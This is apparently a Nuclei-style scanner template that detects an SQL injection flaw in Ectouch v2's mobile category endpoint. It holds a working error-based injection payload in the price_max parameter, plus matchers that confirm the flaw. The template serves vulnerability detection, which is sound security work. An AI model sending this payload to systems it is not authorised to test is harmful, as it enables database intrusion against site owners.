id: etouch-v2-sqli
info:
  name: Ectouch v2 SQL Injection
  author: princechaddha
  severity: high
  reference:
    - https://github.com/mstxq17/CodeCheck/
    - https://www.anquanke.com/post/id/168991
  tags: etouch,sqli
variables:
  num: "999999999"
requests:
  - method: GET
    path:
      - "{{BaseURL}}/upload/mobile/index.php?c=category&a=asynclist&price_max=1.0%20AND%20(SELECT%201%20FROM(SELECT%20COUNT(*),CONCAT(0x7e,md5({{num}}),0x7e,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)''"
    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - '{{md5({{num}})}}'
        part: body
